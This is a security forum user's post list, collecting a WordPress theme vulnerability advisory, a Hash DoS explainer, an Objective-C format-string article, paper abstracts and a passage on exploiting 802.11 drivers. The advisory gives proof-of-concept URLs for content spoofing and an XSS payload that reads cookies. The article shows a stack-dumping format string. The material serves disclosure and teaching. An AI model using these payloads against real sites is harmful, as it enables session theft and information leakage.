Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. Security Code Review Description: His speciality is web application security. After a strong development past his interest turned to security 7 years ago when he participated in a corporate web sso development. Currently he is a trainer and auditor at Cloudbreaker Co. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Security Code Review
  2. de4dot .NET deobfuscator and unpacker [h=1]Description[/h] de4dot is an open source (GPLv3) .NET deobfuscator and unpacker written in C#. It will try its best to restore a packed and obfuscated assembly to almost the original assembly. Most of the obfuscation can be completely restored (eg. string encryption), but symbol renaming is impossible to restore since the original names aren't (usually) part of the obfuscated assembly. [h=1]Features[/h] Here's a pseudo random list of the things it will do depending on what obfuscator was used to obfuscate an assembly: Inline methods. Some obfuscators move small parts of a method to another static method and calls it. Decrypt strings statically or dynamically Decrypt other constants. Some obfuscators can also encrypt other constants, such as all integers, all doubles, etc. Decrypt methods statically or dynamically Remove proxy methods. Many obfuscators replace most/all call instructions with a call to a delegate. This delegate in turn calls the real method. Rename symbols. Even though most symbols can't be restored, it will rename them to human readable strings. Sometimes, some of the original names can be restored, though. Devirtualize virtualized code Decrypt resources. Many obfuscators have an option to encrypt .NET resources. Decrypt embedded files. Many obfuscators have an option to embed and possibly encrypt/compress other assemblies. Remove tamper detection code Remove anti-debug code Control flow deobfuscation. Many obfuscators modify the IL code so it looks like spaghetti code making it very difficult to understand the code. Restore class fields. Some obfuscators can move fields from one class to some other obfuscator created class. Convert a PE exe to a .NET exe. Some obfuscators wrap a .NET assembly inside a Win32 PE so a .NET decompiler can't read the file. Removes most/all junk classes added by the obfuscator. Fixes some peverify errors. Many of the obfuscators are buggy and create unverifiable code by mistake. Restore the types of method parameters and fields [h=1]Supported obfuscators/packers[/h] Agile.NET (aka CliSecure) Babel.NET CodeFort CodeVeil CodeWall CryptoObfuscator DeepSea Obfuscator Dotfuscator .NET Reactor Eazfuscator.NET Goliath.NET ILProtector MaxtoCode MPRESS Rummage Skater.NET SmartAssembly Spices.Net Xenocode Some of the above obfuscators are rarely used (eg. Goliath.NET), so they have had much less testing. Help me out by reporting bugs or problems you find. Download: https://bitbucket.org/0xd4d/de4dot/downloads Sursa: https://bitbucket.org/0xd4d/de4dot/overview
  3. Multiple vulnerabilities in multiple themes for WordPress From: "MustLive" <mustlive () websecurity com ua> Date: Sun, 23 Dec 2012 01:39:25 +0200 Hello list! Some time ago, when I've found vulnerabilities in plugin BuddyPress for WordPress (particularly in Affinity BuddyPress theme for it) with Rokbox, which I disclosed earlier, I also found multiple vulnerable themes for WP with Rokbox. So I want to warn you about multiple vulnerabilities in multiple themes for WordPress. These are themes developed by Rokbox's developers. And they put Rokbox (with JW Player, but without TimThumb) into their themes. These are Content Spoofing, Cross-Site Scripting, Full path disclosure and Information Leakage vulnerabilities. I've disclosed vulnerabilities in JW Player in June and August (including in commercial version JW Player Pro) and disclosed vulnerabilities in Rokbox in December. These vulnerabilities are similar to vulnerabilities in Affinity BuddyPress theme. Also I've found many WP themes by other developers with Rokbox, but I'd write about them separately, because they have much more holes. ------------------------- Affected products: ------------------------- Vulnerable are all WordPress themes by RocketTheme (during quick research I found 16 themes for WP, in addition to above-mentioned theme for BP, but I supposed all their themes contain Rokbox with JW Player 4.4.198). They haven't removed this vulnerable version of JW Player from Rokbox and so from any of their themes (for WP and BP), when I've informed them in August. Here are these 16 vulnerable themes, which I found: rt_afterburner_wp rt_refraction_wp rt_solarsentinel_wp rt_mixxmag_wp (Mixxmag) rt_iridium_wp rt_infuse_wp (infuse) rt_perihelion_wp rt_replicant2_wp rt_affinity_wp rt_nexus_wp rt_sentinel rt_mynxx_wp_vestnikp rt_mynxx_wp (rt.mynxx.wp) rt_moxy_wp rt_terrantribune_wp rt_meridian_wp They will be added to those 94 vulnerable themes for WordPress, in which I've found vulnerabilities (http://websecurity.com.ua/4915/). In Google's index there are now up to 634000 pages with Rokbox at WP sites. So there are a lot of vulnerable themes and web sites with these themes. ---------- Details: ---------- The paths for these themes are the next: http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_refraction_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_solarsentinel_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/Mixxmag/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_iridium_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_infuse_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/infuse/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_perihelion_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_replicant2_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_affinity_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_nexus_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_sentinel/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_mynxx_wp_vestnikp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_mynxx_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt.mynxx.wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_moxy_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_terrantribune_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_meridian_wp/js/rokbox/jwplayer/jwplayer.swf Content Spoofing (WASC-12): In parameter file there can be set as video, as audio files. Swf-file of JW Player accepts arbitrary addresses in parameters file and image, which allows to spoof content of flash - i.e. by setting addresses of video (audio) and/or image files from other site. http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv?=1.jpg Content Spoofing (WASC-12): Swf-file of JW Player accepts arbitrary addresses in parameter config, which allows to spoof content of flash - i.e. by setting address of config file from other site (parameters file and image in xml-file accept arbitrary addresses). For loading of config file from other site it needs to have crossdomain.xml. http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml 1.xml <config> <file>1.flv</file> <image>1.jpg</image> </config> Content Spoofing (WASC-12): http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site XSS (WASC-08): http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B Full path disclosure (WASC-13): In all these themes there is FPD in index.php (http://site/wordpress/wp-content/themes/rt_afterburner_wp/ and the same for other themes), which works at default PHP settings. Also potentially there are FPD in other php-files of these themes. Information Leakage (WASC-13): There are sites with rt_mixxmag_wp theme, which have error log with full paths. http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log ------------ Timeline: ------------ 2012.05.29 - informed developers of JW Player. 2012.06.06 - disclosed at my site about JW Player. 2012.08.18 - informed developers about new holes in JW Player Pro. 2012.08.23 - disclosed at my site about JW Player Pro. 2012.08.28 - informed developers of Rokbox. 2012.12.14 - disclosed at my site about Rokbox. 2012.12.23 - disclosed to the lists about multiple themes for WordPress with Rokbox. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua Sursa: http://seclists.org/fulldisclosure/2012/Dec/236
  4. How to explain Hash DoS to your parents by using cats Published December 20th, 2012 by Barney Desmond We came across this interesting article recently, it’s about how an attacker can perform a denial-of-service attack by feeding perverse input to a system that uses weak hashing algorithms. This is referred to as a Hash DoS, and the specific target mentioned in the article is btrfs. btrfs is a next-gen filesystem that’s expected to replace ext3/4 in Linux. It’s still considered experimental but is quite usable and maturing fast. This article piqued our interest because we’re using btrfs “for reals” here at Anchor. It’s well and good to say that, but the article isn’t very exciting unless you have a background in computer science. How would you explain Hash DoS to your parents, who probably don’t have a CompSci background? This is the internet, so the answer is cats. Welcome to Purrfect Kitty Daycare =--= Let’s pretend that you run a daycare centre for pampered pusses. Doting owners drop their kitty off on the way to work each morning, and pick them up in the afternoon. You look after the pussies fantastically, so business is growing by leaps and bounds with more moggies every week. You can’t look after all the cats, so you hire some enthusiastic helpers. Fast forward a few months, you now have 26 cat-minders working for you while you manage the business. Each minder has their own space to work in. To divide the work, you assign them to minders based on the cat’s name: all cats whose name begins with the letter ‘A’ go to minder no. 1, the cats whose name starts with the letter ‘B’ goes to minder no. 2, and so on. When owners arrive to drop off or pick up their furry bundle of joy, they know exactly which room to go to! It’s super simple and does the job nicely. Your offices look something like this: Assume, for the sake of argument, that you moved into larger premises very quickly. What you’ve implemented is called a hash function. It’s really basic but it does the job. As long as a cat has a name, there’s a room for it, and you always know exactly where to find a cat. When you use a hash function to distribute objects like this, each object (cat) goes into a bucket (room). Kitty Kollisions Your rooms don’t fill up evenly, this is to be expected. You might have a few cats in Room A (Alice, Alison, Amanda), and only one in Room X (Xerxes). Room A has what’s called a hash collision. Finding Xerxes in the afternoon is easy, he has the whole room to himself. When Alice’s owner comes to pick her up, the attendant at the front desk has to ask what she looks like (or remember from previous visits). No big deal, we just have to check all the cats in Room A until we find Alice. It takes a couple of seconds. Sometimes you’ll get a lot of cats in one room, maybe a dozen, but you can still work out which one you’re looking for with a little effort. You’ve got ninety-nine problems but cats ain’t one. Moggy Mischief A rival appears! Kitty Kare has opened up across town and is looking to put you out of business. They’ve seen how your hashing function in action and know how it works. They’re going to use it against you, because they’re evil. First, they need cats. Lots of cats. Maybe they pick up strays off the street, or just get kittens from the internet. It doesn’t matter how, but they’ve got over nine-thousand cats. Now they give them all names starting with “Mr” – Mr Bigglesworth, Mr Fluffles, Mr Mac, Mr Pete, Mr Lincoln, Mr MoonUnit, etc. The list is practically infinite. Each cat gets a little engraved nametag on its collar and goes on its catty way. They bring all the cats to Purrfect Kitty Daycare. Your staff are very smart people, and manage to handle the tsunami of tabbies by moving a few walls around to make enough room. It slows them down a bit, and your customers get irate that they have to wait to drop off their cat, but they get there in the end. Your offices now look something like this: Phew, it’s a good thing you invested in a rapidly reconfigurable walling system! Meltdown Real mayhem arrives in the afternoon: evil employees from Kitty Kare return and ask to pick up ALL the cats. One by one. Placing a cat in the room takes a roughly-fixed amount of time, called constant time when dealing with algorithms, mathematically written as O(1). Finding a particular cat means going to the room and checking all the cats there. The more cats there are, the longer it takes. This is called linear time, written as O(n). On average, your staff have to search about 4,500 cats (half of all the cats in the room) before they happen to find the right one. Things get better as some of the cats are returned to their (evil) owners, but it’s a bad situation for a long time. Your genuine customers are quite angry and upset, and it’s well past midnight by the time you knock off and go home. You get home that night and have dreams. Bad dreams, about being overwhelmed by cats. You’ve just been Hash DoS’d, with cats. Fixing those felines In short, the answer to this problem is to use a hash function that isn’t vulnerable to this sort of attack. A cryptographic hash function is a special type of hash function that makes it difficult to create specifically-chosen collisions like the one shown here. This won’t completely prevent the evil attacker from hammering away and trying to produce cat-names that happen to cause collisions, but it makes life a lot harder for them. A full-blown cryptographic hash function like SHA-1 would probably be overkill for your kitty daycare centre, but it’s the right line of thinking. So long as your hash function can evenly distribute cats into rooms, all you need to worry about is having enough staff to look after them all. Purrfect! Sursa: How to explain Hash DoS to your parents by using cats | Anchor Web Hosting Blog
  5. [h=1]Format Strings: Is Objective-C Objectively Safer?[/h]HP_SSR| August 9, 2012 - last edited August 15, 2012 With the explosion of mobile devices came mobile applications, and with the mobile applications came a plethora of new security and privacy concerns. If you've been following this blog or our products, you probably know that we just released our first Objective-C rulepacks, with a lot more support planned in the future. To kick things off, let's talk about one of the vulnerabilities that our Objective-C rulepacks can detect: format string flaws. A common misconception is that Objective-C is a newer language compared to C and C++, and is therefore immune to many of the classic C vulnerabilities such as buffer overflows. In the C and C++ world, one cousin of the well-known buffer overflow exploit is format string attacks. Since Objective-C also supports format strings, does that mean that its applications are vulnerable as well? Let's first review how C/C++-style format string attacks work, then compare these to what Objective-C lets us do. A string format function, such as printf(), takes in a format string and a variable list of arguments. Normally (with the exception of the %n specifier—more on that later), the format specifiers in the string is replaced with the values of the respective arguments. What happens if there are more specifiers than there are arguments? For example, printf("%d%d%d%d%d\n", val); C and C++ will gladly continue to pop values off the stack until it fills in every value for every format specifier. What if an attacker is able to control the format string? At best, the program will crash or function incorrectly due to the damaged call stack. At worst, it can reveal sensitive information stored in local variables or passed as arguments to functions. The story gets worse. C and C++ support the %n specifier, which writes a value—namely, the number of bytes written thus far—back to the corresponding variable. By controlling the number of bytes written and storing the value of %n, we can write any value back to the stack, including the address of any attacker-controlled malicious code. (To avoid having to write millions of characters just to form a 32-bit address, we can instead write %n four times, a single byte at a time.) If we can also manipulate the stack to fool the program into treating the value as the return pointer, then we can force the program to run our malicious code—not unlike a buffer overflow exploit. So how much of this applies to Objective-C? The good news is that format string methods introduced by Objective-C do not allow the %n specifier, so there are no known ways to execute arbitrary code using format strings. The bad news is that Objective-C attempts to be backwards-compatible with C/C++ libraries, continuing to allow the old %n-style code execution exploits. Nonetheless, even for the newer Objective-C-specific format string methods, using excess format specifiers to pop values off the stack still works: void myfunc(NSString *in) { NSLog(in); NSLog(@"Inside myfunc"); } int main(int argc, char *argv[]) { NSString *test = @"%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"; myfunc(test); return NSApplicationMain(argc, (const char **) argv); } The output is as follows: (gdb) 2012-02-13 22:12:12.525 objc[12983:a0f] 5fbff860.5fbff870.5fbff928.00000012.00000000.00000000.00002070.5fbff840 000017e8.5fbff860.00000000.5fbff848.00002070.5fbff850.00001784.00000000 (gdb) info args in = (NSString *) 0x100002070 (gdb) Note the address of the string test, 00002070, gets printed twice in the output, presumably because it is passed twice as an argument—once to myfunc, and again to NSLog. I should also note that in constructing the above test code, the program has also crashed several times with an EXC_BAD_ACCESS signal, further suggesting that the format string is corrupting the stack pointer. I hope the above evidence is convincing enough to show that Objective-C does not perform any safety checks on format strings, letting them manipulate the call stack easily. The next reasonable question, how exactly can this be exploited? What might vulnerable code in an application look like? Consider the following code snippet: - (BOOL)application:(UIApplication *)application openURL:(NSURL *)url sourceApplication:(NSString *)sourceApplication annotation:(id)annotation { // Write to debugging log NSLog(@"++ Entered application"); NSString *urlquery = [url query]; NSLog(urlquery); ... } This is one of the most common mistakes when using NSLog, which in turn can lead to a format string vulnerability. According to the official documentation, NSLog()'s first parameter is not a simple string, but in fact a format string. A rogue (or compromised) process might take advantage of this vulnerability by launching the app via its registered URL scheme and supply a URL with extraneous format specifiers. When the program reaches the line NSLog(urlquery), the NSLog() method now expects the values to fill in for these specifiers. It does this by gladly reaching backwards into the call stack, which corrupts the state of the stack. This causes the rest of the program to run incorrectly or eventually crash. So in short, while Objective-C format strings manage to avoid some of the more heinous exploits that allow for arbitrary code execution, they are still vulnerable to stack manipulation. Attackers can still crash your program at best, and dump sensitive data at worst. Avoid using legacy C/C++ format string methods if possible; these are still vulnerable to the code execution exploits of old. In general, be careful when working with format strings; always make sure there are equal numbers of format specifiers and arguments. More importantly, do not let sources outside of your control, such as data and messages from other applications or web services, control any part of your format strings. Posted by sarah at 12:00 PM Sursa: HP Communities - Format Strings: Is Objective-C Objectively Safer? - Enterprise Business Community
  6. Foreign Code Detection on theWindows/X86 Platform Susanta Nanda Wei Li Lap-Chung Lam Tzi-cker Chiueh {susanta,weili,lclam,chiueh}@cs.sunysb.edu Department of Computer Science SUNY at Stony Brook Stony Brook, NY 11794-4400 Abstract As new attacks againstWindows-based machines emerge almost on a daily basis, there is an increasing need to “lock down” individual users’ desktop machines in corporate computing environments. One particular way to lock down a user computer is to guarantee that only authorized binary programs are allowed to run on that computer. A major advantage of this approach is that binaries downloaded without the user’s knowledge, such as spyware, adware, or code entering through buffer overflow attacks, can never run on computers that are locked down this way. This paper presents the design, implementation and evaluation of FOOD, a foreign code detection system specifically for the Windows/X86 platform, where foreign code is defined as any binary programs that do not go through an authorized installation procedure. FOOD verifies the legitimacy of binary images involved in process creation and library loading to ensure that only authorized binaries are used in these operations. In addition, FOOD checks the target address of every indirect branch instruction in Windows binaries to prevent illegitimate control transfers to either dynamically injected mobile code or pre-existing library functions that are potentially damaging. Combined together, these techniques strictly prevent the execution of any foreign code. Experiments with a fully working FOOD prototype show that it can indeed stop all spyware and buffer overflow attacks we tested, and its worst-case run-time performance overhead associated with foreign code detection is less than 35%. Download: www.acsac.org/2006/papers/86.pdf
  7. Address-Space Randomization for Windows Systems Lixin Li and James E. Just R. Sekar Global InfoTek, Inc., Reston, VA Stony Brook University, Stony Brook, NY {nli,jjust}@globalinfotek.com sekar@cs.stonybrook.edu Abstract Address-space randomization (ASR) is a promising solution to defend against memory corruption attacks that have contributed to about three-quarters of USCERT advisories in the past few years. Several techniques have been proposed for implementing ASR on Linux, but its application to Microsoft Windows, the largest monoculture on the Internet, has not received as much attention. We address this problem in this paper and describe a solution that provides about 15-bits of randomness in the locations of all (code or data) objects. Our randomization is applicable to all processes on a Windows box, including all core system services, as well as applications such as web browsers, office applications, and so on. Our solution has been deployed continuously for about a year on a desktop system used daily, and is robust enough for production use. Download: seclab.cs.sunysb.edu/seclab/pubs/acsac06.pdf
  8. Reverse Stack Execution Babak Salamat bsalamat@uci.edu Andreas Gal gal@uci.edu Alexander Yermolovich ayermolo@uci.edu Karthik Manivannan kmanivan@uci.edu Michael Franz franz@uci.edu Donald Bren School of Information and Computer Sciences University of California, Irvine Irvine, CA 92697, USA Technical Report No. 07-07 August 23, 2007 Abstract Introducing variability during program execution is an eective technique for ghting software monoculture which enables the quick spread of malicious code such as viruses and worms. Existing works in the area of automatic genera- tion of execution variability have been limited to instruction randomization and heap allocation randomization, even though stack over ows are the predomi- nant attack vectors used to inject malicious code. We present a compiler-based technique that introduces stack variance by reversing the stack growth direc- tion, and is thus able to close this loophole. In this paper we discuss the steps necessary to reverse the stack growth direction for the Intel x86 instruction set which was designed for a single stack growth direction. The performance eval- uation of our approach shows a negligible overhead for most applications. For one of the benchmark applications, we see a small performance gain. Download: www.ics.uci.edu/~kmanivan/files/TechReport07-07.pdf
  9. Detection and Subversion of Virtual Machines Dan Upton University of Virginia CS 851 - Virtual Machines Abstract Recent virtual machines have been designed to take advantage of run-time information to provide various services including dynamic optimization, instrumenta- tion, and enforcement of security policies. While these systems must run in the same user space as the pro- gram running under their control, they must remain as transparent as possible so as to prevent aecting the correctness of the guest program. However, the virtual machine must store its own code and program state as well as information about the guest program. This data, stored in the program's user space, may lead to gaps in transparency that can be used to detect their pres- ence. Additionally, while many virtual machines have a smaller code base than operating systems, they may still contain their own unique errors and security holes. This research shows that it is possible to use dierent run-time clues to detect the existence of several com- mon virtual machines. Further, information about the existence of these virtual machines can be used to at- tack the system. As a result, this paper presents coun- termeasures that should be taken by designers of these systems to prevent detection and attacks. Download: www.cs.virginia.edu/~dsu9w/upton06detection.pdf
  10. BUFFER OVERFLOW VULNERABILITIES EXPLOITS AND DEFENSIVE TECHNIQUES Authors Peter Buchlovsky, Adam Butcher UID 319295, 309235 Email msc33pxb@cs.bham.ac.uk, ug75ajb@cs.bham.ac.uk Introduction Buffer overflows are a very common method of security breach. They generally occur in programs written in low-level languages like C or C++ which allow the manual management of memory on the heap and stack. Server processes or low-level programs running as the superuser are the usual targets for such attacks. If a hacker can find a buffer overflow vulnerability in such a process and can exploit it, it will usually give the hacker full control of the system. The analysis of Lhee and Chapin [8] has proved most helpful in our research. 1.1 Array bounds checking Most high-level programming languages claim to be safe. This means that programs written in these language have rigorously controlled access to memory. Thus they do not suffer from buffer overflows or dangling pointers. This is in contrast to the C and C++ programming languages which have a more cavalier approach to memory access and safety. In C, array access is not bounds checked. That means it is possible to write past the end (or indeed the beginning if it is being written to backwards) of an array. This leads to a number of exploits that can used by attackers. Download: citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.104.8202&rep=rep1&type=pdf
  11. Code Injection Attacks on Harvard-Architecture Devices Aurélien Francillon INRIA Rhône-Alpes 655 avenue de l’Europe, Montbonnot 38334 Saint Ismier Cedex, France aurelien.francillon@inria.fr Claude Castelluccia INRIA Rhône-Alpes 655 avenue de l’Europe, Montbonnot 38334 Saint Ismier Cedex, France claude.castelluccia@inria.fr ABSTRACT Harvard architecture CPU design is common in the embed- ded world. Examples of Harvard-based architecture devices are the Mica family of wireless sensors. Mica motes have limited memory and can process only very small packets. Stack-based buer over ow techniques that inject code into the stack and then execute it are therefore not applicable. It has been a common belief that code injection is impossible on Harvard architectures. This paper presents a remote code injection attack for Mica sensors. We show how to exploit program vulnerabilities to permanently inject any piece of code into the program memory of an Atmel AVR-based sen- sor. To our knowledge, this is the rst result that presents a code injection technique for such devices. Previous work only succeeded in injecting data or performing transient at- tacks. Injecting permanent code is more powerful since the attacker can gain full control of the target sensor. We also show that this attack can be used to inject a worm that can propagate through the wireless sensor network and possibly create a sensor botnet. Our attack combines dierent tech- niques such as return oriented programming and fake stack injection. We present implementation details and suggest some counter-measures. Download: www.inrialpes.fr/planete/people/ccastel/PAPERS/CCS08.pdf
  12. Exploiting 802.11 Wireless Driver Vulnerabilities on Windows Exploiting 802.11 Wireless Driver Vulnerabilities on Windows 11/2006 Johnny Cache (johnycsh[a t]802.11mercenary.net) H D Moore (hdm[a t]metasploit.com) skape (mmiller[a t]hick.org) 1) Foreword Abstract: This paper describes the process of identifying and exploiting 802.11 wireless device driver vulnerabilities on Windows. This process is described in terms of two steps: pre-exploitation and exploitation. The pre-exploitation step provides a basic introduction to the 802.11 protocol along with a description of the tools and libraries the authors used to create a basic 802.11 protocol fuzzer. The exploitation step describes the common elements of an 802.11 wireless device driver exploit. These elements include things like the underlying payload architecture that is used when executing arbitrary code in kernel-mode on Windows, how this payload architecture has been integrated into the 3.0 version of the Metasploit Framework, and the interface that the Metasploit Framework exposes to make developing 802.11 wireless device driver exploits easy. Finally, three separate real world wireless device driver vulnerabilities are used as case studies to illustrate the application of this process. It is hoped that the description and illustration of this process can be used to show that kernel-mode vulnerabilities can be just as dangerous and just as easy to exploit as user-mode vulnerabilities. In so doing, awareness of the need for more robust kernel-mode exploit prevention technology can be raised. Thanks: The authors would like to thank David Maynor, Richard Johnson, and Chris Eagle. 2) Introduction Software security has matured a lot over the past decade. It has gone from being an obscure problem that garnered little interest from corporations to something that has created an industry of its own. Corporations that once saw little value in investing resources in software security now have entire teams dedicated to rooting out security issues. The reason for this shift in attitude is surely multifaceted, but it could be argued that the greatest influence came from improvements to exploitation techniques that could be used to take advantage of software vulnerabilities. The refinement of these techniques made it possible for reliable exploits to be used without any knowledge of the vulnerability. This shift effectively eliminated the already thin crutch of barrier-to-entry complacency which many corporations were guilty of leaning on. Whether or not the refinement of exploitation techniques was indeed the turning point, the fact remains that there now exists an industry that has been spawned in the name of software security. Of particular interest for the purpose of this paper are the corporations and individuals within this industry that have invested time in researching and implementing solutions that attempt to tackle the problem of exploit prevention. As a result of this time investment, things like non-executable pages, address space layout randomization (ASLR), stack canaries, and other novel preventative measures are becoming common place in the desktop market. While there should be no argument that the main-stream integration of many of these technologies is a good thing, there's a problem. This problem centers around the fact that the majority of these exploit prevention solutions to date have been slightly narrow-sighted in their implementations. In particular, these solutions generally focus on preventing exploitation in only one context: user-mode. This is not true in all cases. The authors would like to take care to mention that solutions like grsecurity from the PaX team have had support for features that help to provide kernel-level security. Furthermore, stack canary implementations have existed and are integrated with many mainstream kernels. However, not all device drivers have been compiled to take advantage of these new enhancements. The reason for this narrow-sightedness is often defended based on the fact that kernel-mode vulnerabilities have been far less prevalent. Furthermore, kernel-mode vulnerabilities are considered by most to require a much more sophisticated attack when compared with user-mode vulnerabilities. The prevalence of kernel-mode vulnerabilities could be interpreted in many different ways. The naive way would be to think that kernel-mode vulnerabilities really are few and far between. After all, this is code that should have undergone rigorous code coverage testing. A second interpretation might consider that kernel-mode vulnerabilities are more complex and thus harder to find. A third interpretation might be that there are fewer eyes focused on looking for kernel-mode vulnerabilities. While there are certainly other factors, the authors feel that it is probably best captured by the second and third interpretation. Even if prevalence is affected because of the relative difficulty of exploiting kernel-mode vulnerabilities, it's still a poor excuse for exploit prevention solutions to simply ignore it. The past has already shown that exploitation techniques for user-mode vulnerabilities were refined to the point of creating increasingly reliable exploits. These increasingly reliable exploits were then incorporated into automated worms. What's so different about kernel-mode vulnerabilities? Sure, they are complicated, but so were heap overflows. The authors see no reason to expect that kernel-mode vulnerabilities won't also experience a period of revolutionary public advancements to existing exploitation techniques. In fact, this period has already started[5,2,1]. Still, most corporations seem content to lean on the same set of crutches, waiting for proof that a problem really exists. It's hoped that this paper can assist in the process of making it clear that kernel-mode vulnerabilities can be just as easy to exploit as user-mode vulnerabilities. It really shouldn't come as a surprise that kernel-mode vulnerabilities exist. The intense focus put upon preventing the exploitation of user-mode vulnerabilities has caused kernel-mode security to lag behind. This lag is further complicated by the fact that developers who write kernel-mode software must generally have a completely different mentality relative to what most user-mode developers are acustomed to. This is true regardless of what operating system a programmer might be dealing with (so long as it's a task-oriented operating system with a clear separation between system and user). User-mode programmers who decide to dabble in writing device drivers for NT will find themselves in for a few surprises. The most apparent thing one would notice is that the old Windows Driver Model (WDM) and the new Windows Driver Framework (WDF) represent completely different APIs relative to what a user-mode developer would be familiar with. There are a number of standard C runtime artifacts that can still be used, but their use in device driver code stands out like a sore thumb. This fact hasn't stopped developers from using dangerous string functions. While the API being completely different is surely a big hurdle, there are a number of other gotchas that a user-mode programmer wouldn't normally find themselves worrying about. One of the most interesting limitations imposed upon device driver developers is the conservation of stack space. On modern derivatives of NT, kernel-mode threads are only provided with 3 pages (12288 bytes) of stack space. In user-mode, thread stacks will generally grow as large as 256KB (this default limit is controlled by the optional header of an executable binary). Due to the limited amount of kernel-mode thread stack space, it should be rare to ever see a device driver consuming a large amount of space within a stack frame. Nevertheless, it was observed that the Intel Centrino drivers have multiple instances of functions that consume over 1 page of stack space. That's 33% of the available stack space wasted within one stack frame! Perhaps the most important of all of the differences is the extra care that must be taken when it comes to dealing with things like performance, error handling, and re-entrancy. These major elements are critical to ensuring the stability of the operating system as a whole. If a programmer is negligent in their handling of any of these things in user-mode, the worst that will happen is the application will crash. In kernel-mode, however, a failure to properly account for any of these elements will generally affect the stability of the system as a whole. Even worse, security related flaws in device drivers provide a point of exposure that can result in super-user privileges. From this very brief introduction, it is hoped that the reader will begin to realize that device driver development is a different world. It's a world that's filled with a greater number of restrictions and problems, where the implications of software bugs are much greater than one would normally see in user-mode. It's a world that hasn't yet received adequate attention in the form of exploit prevention technology, thus making it possible to improve and refine kernel-mode exploitation techniques. It should come as no surprise that such a world would be attractive to researchers and tinkerers alike. This very attraction is, in fact, one of the major motivations for this paper. While the authors will focus strictly on the process used to identify and exploit flaws in wireless device drivers, it should be noted that other device drivers are equally likely to be prone to security issues. However, most other device drivers don't have the distinction of exposing a connectionless layer2 attack surface to all devices in close proximity. Frankly, it's hard to get much cooler than that. That only happens in the movies, right? To kick things off, the structure of this paper is as follows. In chapter 3, the steps used to find vulnerabilities in wireless device drivers, such as through the use of fuzzing, are described. Chapter 4 explains the process of actually leveraging a device driver vulnerability to execute arbitrary code and how the 3.0 version of the Metasploit Framework has been extended to make this trivial to deal with. Finally, chapter 5 provides three real world examples of wireless device driver vulnerabilities. Each real world example describes the trials and tribulations of the vulnerability starting with the initial discovery and ending with arbitrary code execution. 3) Pre-Exploitation This chapter describes the tools and strategies used by the authors to identify 802.11 wireless device driver vulnerabilities. Section 3.1 provides a basic description of the 802.11 protocol in order to provide the reader with information necessary to understand the attack surface that is exposed by 802.11 device drivers. Section 3.2 describes the basic interface exposed by the 3.0 version of the Metasploit Framework that makes it possible to craft arbitrary 802.11 packets. Finally, section 3.3 describes a basic approach to fuzzing certain aspects of the way a device driver handles certain 802.11 protocol functions. 3.1) Attack Surface Device drivers suffer from the same types of vulnerabilities that apply to any other code written in the C programming language. Buffer mismanagement, faulty pointer math, and integer overflows can all lead to exploitable conditions. Device driver flaws are often seen as a low risk issue due to the fact that most drivers do not process attacker-controlled data. The exception, of course, are drivers for networking devices. Although Ethernet devices (and their drivers) have been around forever, the simplicity of what the driver has to handle has greatly limited the attack surface. Wireless drivers are required to handle a wider range of requests and are also required to expose this functionality to anyone within range of the wireless device. In the world of 802.11 device drivers, the attack surface changes based on the state of the device. The three primary states are: 1. Unauthenticated and Unassociated 2. Authenticated and Unassociated 3. Authenticated and Associated In the first state, the client is not connected to a specific wireless network. This is the default state for 802.11 drivers and will be the focus for this section. The 802.11 protocol defines three different types of frames: Control, Management, and Data. These frame types are further divided into three classes (1, 2, and 3). Only frames in the first class are processed in the Unauthenticated and Unassociated state. The following 802.11 management sub-types are processed by clients while in state 1[3]: 1. Probe Request 2. Probe Reponse 3. Beacon 4. Authentication The Probe Response and Beacon sub-types are used by wireless devices to discover and advertise the local wireless networks. Clients can transmit Probe Responses to discover networks as well (more below). The Authentication sub-type is used to join a specific wireless network and reach the second state. Wireless clients discover the list of available networks in two different ways. In Active Mode, the client will send a Probe Request containing an empty SSID field. Any access point in range will reply with a 